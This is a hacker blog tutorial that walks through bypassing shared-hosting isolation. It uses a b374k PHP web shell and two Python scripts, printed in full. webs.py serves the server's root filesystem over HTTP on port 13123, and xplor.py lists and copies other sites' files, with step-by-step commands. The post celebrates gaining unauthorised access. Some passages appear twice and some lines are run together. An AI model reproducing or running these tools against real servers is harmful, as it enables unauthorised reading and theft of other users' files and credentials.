As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.
For getting success with this tutorial are required the following things:
For getting success with this tutorial are required the following things:
- Python Installed on Server
- b374k.php shell
- And some scripts u will see below.
This idea have start from devilzc0de geeks and let me explain how it work.
here we are in folder
/var/www/here we are in folder
dono and trying to go into /www/
no permissions to go into /www .
before we got tired by trying the commands u must check if if python it's installed with command :
before we got tired by trying the commands u must check if if python it's installed with command :
python -h
Now take this python script and name it as
webs.py , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .#!/usr/bin/env python# devilzc0de.org (c) 2012import SimpleHTTPServerimport SocketServerimport osport = 13123if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://maho.com:" + str(port)) httpd.serve_forever()
Next u wil need to run the webs.py script by following command
python webs.py
open the site with port 13123
site.com:13123
Let's go with next method of symlink server bypassing , like u see and into before post now i will explain a new trick with an other tool.
http://www.flashcrew.in/2012/05/serv...umping-in.html
-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source
http://www.flashcrew.in/2012/05/serv...umping-in.html
-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os
def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer = source.read(buffer_size)
if copy_buffer:
dest.write(copy_buffer)
else:
break
source.close()
dest.close()
if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
sys.exit(1)
target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)
sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
else:
f = open(target, "rb")
try:
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
while byte != "":
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
finally:
f.close()
else:
sys.stdout.write("Can't found file or folder : " + target)
http://pastebin.com/WqmCE2sJ # devilzc0de.org (c) 2012
import sys
import os
def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer = source.read(buffer_size)
if copy_buffer:
dest.write(copy_buffer)
else:
break
source.close()
dest.close()
if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
sys.exit(1)
target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)
sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
else:
f = open(target, "rb")
try:
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
while byte != "":
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
finally:
f.close()
else:
sys.stdout.write("Can't found file or folder : " + target)
testing the script
python xplor.pyUser the tool to view folders where not have any permission to read inside
python xplor.py /var/www/index.php
View the files in no access folder .
python xplor.py /var/www/index.php
copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg
And yeah file it's here
Yeahh fucking access it's granted
Some thing u can do with those other scripts in perl
webs.pl
and
xplor.pl
enjoy it :)
0 nhận xét:
Post a Comment